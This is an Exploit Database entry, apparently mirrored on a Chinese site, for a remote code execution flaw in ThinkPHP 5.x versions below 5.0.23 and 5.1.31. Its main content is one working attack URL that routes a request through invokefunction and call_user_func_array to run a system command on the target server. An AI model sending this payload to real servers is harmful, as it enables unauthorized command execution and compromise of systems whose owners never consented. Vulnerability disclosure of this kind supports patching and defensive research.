ThinkPHP 5.0.23/5.1.31 – Remote Code Execution

• Exploit Database
• 16 阅读

• 作者： VulnSpy
  日期： 2018-12-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45978/

• # Exploit Title: ThinkPHP 5.x < v5.0.23,v5.1.31 Remote Code Execution
  # Date: 2018-12-11
  # Exploit Author: VulnSpy
  # Vendor Homepage: https://thinkphp.cn
  # Software Link: https://github.com/top-think/framework/
  # Version: v5.x below v5.0.23,v5.1.31
  # CVE: N/A
  
  # Exploit
  
  http://server/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'